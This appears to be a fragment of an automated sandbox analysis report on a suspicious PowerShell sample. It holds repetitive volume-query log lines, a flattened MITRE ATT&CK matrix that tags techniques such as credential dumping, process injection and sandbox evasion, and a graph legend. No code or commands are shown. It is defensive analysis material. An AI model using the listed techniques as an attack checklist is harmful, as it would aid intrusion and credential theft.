      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		Valid Accounts1
      PowerShell      		1
      Scripting      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping11
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Registry Run Keys / Startup Folder      		1
      Registry Run Keys / Startup Folder      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture4
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
